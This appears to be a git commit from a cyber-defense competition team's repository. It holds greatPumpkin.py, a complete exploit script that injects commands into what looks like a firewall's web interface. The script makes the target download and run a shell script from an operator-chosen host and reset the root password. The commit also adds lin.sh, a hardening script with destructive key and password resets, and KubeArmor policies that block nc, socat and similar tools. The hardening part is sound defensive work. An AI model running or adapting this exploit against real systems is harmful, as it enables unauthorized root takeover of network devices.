Adding some entertaining but largely useless tooling

.gitignore

@@ -0,0 +1 @@
+.DS_Store

GreatPumpkin/greatPumpkin.py

@@ -0,0 +1,84 @@
+import threading
+import socket
+import os
+from http.server import BaseHTTPRequestHandler, HTTPServer
+import requests
+import ssl
+import urllib3
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+if os.geteuid() != 0:
+    print("Error: This script must be run as root to bind to port 80.")
+    exit(1)
+
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+result = sock.connect_ex(('0.0.0.0', 80))
+if result == 0:
+    print("Error: Port 80 is already in use.")
+    exit(1)
+sock.close()
+
+HEADER = input("Enter header: ").strip()
+
+HOSTNAME = input("Enter the IP: ").strip()
+PAYLOAD_NAME = "great.php"
+
+password = input("Enter the password to set for root: ").strip()
+encoded_password = f"echo 'root:{password}' | chpasswd\n"
+
+class CustomHandler(BaseHTTPRequestHandler):
+    def do_GET(self):
+        self.send_response(200)
+        self.send_header("Content-Type", "text/plain")
+        self.end_headers()
+        self.wfile.write(encoded_password.encode())
+
+def start_server():
+    server_address = ("0.0.0.0", 80)
+    httpd = HTTPServer(server_address, CustomHandler)
+    httpd.serve_forever()
+
+def run_command(command):
+    try:
+        response = requests.post(
+            f'https://{HOSTNAME}/php/utils/createRemoteAppwebSession.php/pumpkin.js.map', 
+            headers={HEADER: 'off', 'Content-Type': 'application/x-www-form-urlencoded'},
+            data={
+                "user": f"`echo $({command}) > /var/appweb/htdocs/unauth/{PAYLOAD_NAME}`",
+                "userRole": "superuser",
+                "remoteHost": "",
+                "vsys": "vsys1"
+            },
+            verify=False
+        )
+        session_id = response.text.split("PHPSESSID=")[1].split("@end@")[0]
+
+        requests.get(
+            f'https://{HOSTNAME}/index.php/.js.map',
+            headers={HEADER: 'off', 'Cookie': f'PHPSESSID={session_id}'},
+            verify=False
+        )
+
+        final_response = requests.get(
+            f'https://{HOSTNAME}/unauth/{PAYLOAD_NAME}',
+            headers={HEADER: 'off', 'Cookie': f'PHPSESSID={session_id}'},
+            verify=False
+        )
+        print(final_response.content.decode())
+    except Exception as e:
+        print(f"Error executing command: {e}")
+
+def main():
+    server_thread = threading.Thread(target=start_server, daemon=True)
+    server_thread.start()
+
+    ip_address = input("IP Address of the webserver serving the index.html: ").strip()
+    print("Removing old index.html...")
+    run_command("rm index.html") 
+    print("Wgetting new index.html...")
+    run_command(f"wget {ip_address}") 
+    print("Running new index.html...")
+    run_command(f"sh index.html") 
+
+if __name__ == "__main__":
+    main()

Linux_Misc/lin.sh

@@ -0,0 +1,146 @@
+#!/bin/bash
+
+
+echo -e "         _
+        (:)_
+      ,'    \`.
+     :        :
+     |        |              ___
+     |       /|    ______   // _\\
+     ; -  _,' :  ,'      \`. \\\\  -\\
+    /          \\/          \\ \\\\  :
+   (            :  ------.  \`-'  |
+____\\___    ____|______   \\______|_______
+        |::|           '--\`           SSt
+        |::|
+        |::|
+        |::|
+        |::;
+        \`:/
+"
+echo -e "\033[34m[i] Snoopy on Security\033[0m"
+
+echo -e "\033[34m[i] Running...\033[0m"
+
+mkdir /.x84
+cp -rp {/var/www,/etc,/home,/opt,/root} /.x84 &
+
+rm -rf /root/.ssh/*
+rm -rf /home/*/.ssh/authorized_keys
+rm -f /root/.bashrc
+rm -f /home/*/.bashrc
+
+echo -e "\033[34m[i] Deleted SSH Keys\033[0m"
+
+
+read -p "Enter pass: " -s pass && for i in $(cut -d: -f1 /etc/shadow | grep -v 'blackteam_adm'); do echo -e "$pass\n$pass" | passwd "$i"; done
+
+echo -e "\033[34m[i] Set Password\033[0m"
+
+echo -e "\033[34m[i] Installing Lucy\033[0m"
+
+sysctl fs.inotify.max_user_watches=524288
+
+if [ -f /etc/debian_version ]; then
+    # Debian-based system
+    cd ./Lucy
+    apt --no-install-recommends install ./lucy.deb -y
+    systemctl enable kubearmor
+    systemctl start kubearmor
+    cd ..
+elif [ -f /etc/redhat-release ]; then
+    # RPM-based system
+    rpm -i ./Lucy/lucy.rpm
+    systemctl enable kubearmor
+    systemctl start kubearmor
+else
+    echo "Error: Unsupported system type. Cannot install package."
+    exit 1
+fi
+
+echo -e "\033[34m[i] Installing Spike\033[0m"
+
+./Spike/spike --install
+
+
+echo -e "\033[34m[i] Installing RedBaron\033[0m"
+
+cd ./RedBaron
+./redbaron --install
+cd ..
+
+#./PeppermintPatty/PeppermintPatty.sh
+
+
+sed -i 's/#PubkeyAuthentication yes/PubkeyAuthentication no/' /etc/ssh/sshd_config
+sed -i 's/#PermitEmptyPasswords yes/PermitEmptyPasswords no/' /etc/ssh/sshd_config
+
+echo "Run this command to restart sshd: systemctl restart sshd"
+
+echo -e "\033[34m[i] Updating Packages\033[0m"
+if command -v apt >/dev/null; then
+    apt update
+    apt install --reinstall openssh-server auditd ripgrep clamav debsums libapache2-mod-security2 acl -y
+    sudo apt -o Dpkg::Options::="--force-confmiss" install --reinstall libpam-modules -y
+    apt remove --purge cron crontab at -y
+    apt install --reinstall libpam-modules -y
+elif command -v yum >/dev/null; then
+    yum install policycoreutils-python auditd ripgrep mod_security mod_security_crs iptables -y
+    yum install -y yum-utils
+    yum-config-manager --add-repo=https://copr.fedorainfracloud.org/coprs/carlwgeorge/ripgrep/repo/epel-7/carlwgeorge-ripgrep-epel-7.repo
+    yum install -y ripgrep
+    sudo yum reinstall pam openssh-server -y
+    yum remove cronie chrony cronie-noanacron at cronie-anacron crontabs -y
+elif command -v pacman >/dev/null; then
+    pacman -S --noconfirm --needed openssh audit clamav pam acl apache-mod-security
+    pacman -Rns --noconfirm cronie at
+    pacman -S --noconfirm pam --needed
+else
+    echo "Error: No supported package manager found."
+    exit 1
+fi
+
+echo -e "\033[34m[i] kill cron\033[0m"
+# kill cron
+killall cron
+killall atd
+killall crond
+killall anacron
+
+
+echo -e "\033[34m[i] Setting Audit Rules\033[0m"
+
+auditctl -a exit,always -F arch=b64 -F euid=0 -S execve -k audit-wazuh-c
+auditctl -a exit,always -F arch=b32 -F euid=0 -S execve -k audit-wazuh-c
+auditctl -a exit,always -F arch=b64 -F euid!=0 -S execve -k audit-wazuh-c
+auditctl -a exit,always -F arch=b32 -F euid!=0 -S execve -k audit-wazuh-c
+
+echo -e "\033[34m[i] Setting Permissions\033[0m"
+setfacl -m u:www-data:--- $(which bash) 2>/dev/null
+setfacl -m u:www-data:--- $(which dash) 2>/dev/null
+setfacl -m u:www-data:--- $(which sh) 2>/dev/null
+setfacl -m u:www-data:--- $(which setfacl) 2>/dev/null
+setfacl -m u:apache:--- $(which bash) 2>/dev/null
+setfacl -m u:apache:--- $(which dash) 2>/dev/null
+setfacl -m u:apache:--- $(which sh) 2>/dev/null
+setfacl -m u:apache:--- $(which setfacl) 2>/dev/null
+
+
+
+echo -e "\033[34m[i] Removing sudoedit\033[0m"
+
+rm -f $(which sudoedit) 2>/dev/null
+
+echo -e "\033[34m[i] Setting Permissions\033[0m"
+
+chmod 0755 /usr/bin/pkexec 2>/dev/null
+
+command -v mysqldump >/dev/null && mysqldump -u root --all-databases > /.x84/db.sql && chmod 000 /.x84/db.sql
+chattr +i /.x84 2>/dev/null
+
+chattr +i /lib/x86_64-linux-gnu/security 2>/dev/null
+
+chattr -R +i /var/www 2>/dev/null
+
+systemctl restart redbaronedr
+systemctl start spike

Lucy/README.md

@@ -0,0 +1,2 @@
+.deb and .rpm are publicly available at https://github.com/kubearmor/KubeArmor/releases/tag/v1.5.2
+no modifications have been made

Lucy/football/files/allowpolicy.yaml

@@ -0,0 +1,13 @@
+apiVersion: security.kubearmor.com/v1
+kind: KubeArmorHostPolicy
+metadata:
+  name: ccdc-allow-bash-history
+spec:
+  nodeSelector:
+    matchLabels:
+      kubearmor.io/hostname: "*" # Apply to all hosts
+  file:
+    matchPaths:
+      - path: /root/.bash_history
+  action:
+    Allow

Lucy/football/files/readonly-bins.yaml

@@ -0,0 +1,24 @@
+apiVersion: security.kubearmor.com/v1
+kind: KubeArmorHostPolicy
+metadata:
+  name: ccdc-readonly-bins
+spec:
+  nodeSelector:
+    matchLabels:
+      kubearmor.io/hostname: "*" # Apply to all hosts
+  file:
+    matchDirectories:
+      - dir: /bin
+        recursive: true
+        readOnly: true
+      - dir: /sbin
+        recursive: true
+        readOnly: true
+      - dir: /usr/bin
+        recursive: true
+        readOnly: true
+      - dir: /usr/sbin
+        recursive: true
+        readOnly: true
+  action:
+    Block

Lucy/football/files/readonly-general.yaml

@@ -0,0 +1,39 @@
+apiVersion: security.kubearmor.com/v1
+kind: KubeArmorHostPolicy
+metadata:
+  name: ccdc-readonly-general
+spec:
+  nodeSelector:
+    matchLabels:
+      kubearmor.io/hostname: "*" # Apply to all hosts
+  file:
+    matchDirectories:
+      - dir: /usr/
+        recursive: true
+        readOnly: true
+      - dir: /opt/
+        recursive: true
+        readOnly: true
+      - dir: /root/
+        recursive: true
+        readOnly: true
+      - dir: /lib/
+        recursive: true
+        readOnly: true
+      - dir: /lib64/
+        recursive: true
+        readOnly: true
+      - dir: /srv/
+        recursive: true
+        readOnly: true
+      - dir: /mnt/
+        recursive: true
+        readOnly: true
+      - dir: /snap/
+        recursive: true
+        readOnly: true
+      - dir: /tmp/
+        recursive: true
+        readOnly: true
+  action:
+    Block

Lucy/football/files/readonly-web.yaml

@@ -0,0 +1,15 @@
+apiVersion: security.kubearmor.com/v1
+kind: KubeArmorHostPolicy
+metadata:
+  name: ccdc-readonly-web
+spec:
+  nodeSelector:
+    matchLabels:
+      kubearmor.io/hostname: "*" # Apply to all hosts
+  file:
+    matchDirectories:
+      dir: /var/www/ # try sleep 1
+      recursive: true
+      readOnly: true
+  action:
+    Block

Lucy/football/network.yaml

@@ -0,0 +1,54 @@
+apiVersion: security.kubearmor.com/v1
+kind: KubeArmorHostPolicy
+metadata:
+  name: ccdc-network-block
+spec:
+  nodeSelector:
+    matchLabels:
+      kubearmor.io/hostname: "*" # Apply to all hosts
+  network:
+    matchProtocols:
+    - protocol: tcp
+      fromSource:
+      - path: /usr/local/sbin/nc
+      - path: /usr/local/bin/nc
+      - path: /usr/sbin/nc
+      - path: /usr/bin/nc
+      - path: /sbin/nc
+      - path: /bin/nc
+      - path: /usr/games/nc
+      - path: /usr/local/games/nc
+      - path: /usr/local/sbin/ncat
+      - path: /usr/local/bin/ncat
+      - path: /usr/sbin/ncat
+      - path: /usr/bin/ncat
+      - path: /sbin/ncat
+      - path: /bin/ncat
+      - path: /usr/games/ncat
+      - path: /usr/local/games/ncat
+      - path: /usr/local/sbin/netcat
+      - path: /usr/local/bin/netcat
+      - path: /usr/sbin/netcat
+      - path: /usr/bin/netcat
+      - path: /sbin/netcat
+      - path: /bin/netcat
+      - path: /usr/games/netcat
+      - path: /usr/local/games/netcat
+      - path: /usr/local/sbin/socat
+      - path: /usr/local/bin/socat
+      - path: /usr/sbin/socat
+      - path: /usr/bin/socat
+      - path: /sbin/socat
+      - path: /bin/socat
+      - path: /usr/games/socat
+      - path: /usr/local/games/socat
+      - path: /usr/local/sbin/teleport
+      - path: /usr/local/bin/teleport
+      - path: /usr/sbin/teleport
+      - path: /usr/bin/teleport
+      - path: /sbin/teleport
+      - path: /bin/teleport
+      - path: /usr/games/teleport
+      - path: /usr/local/games/teleport
+  action:
+    Block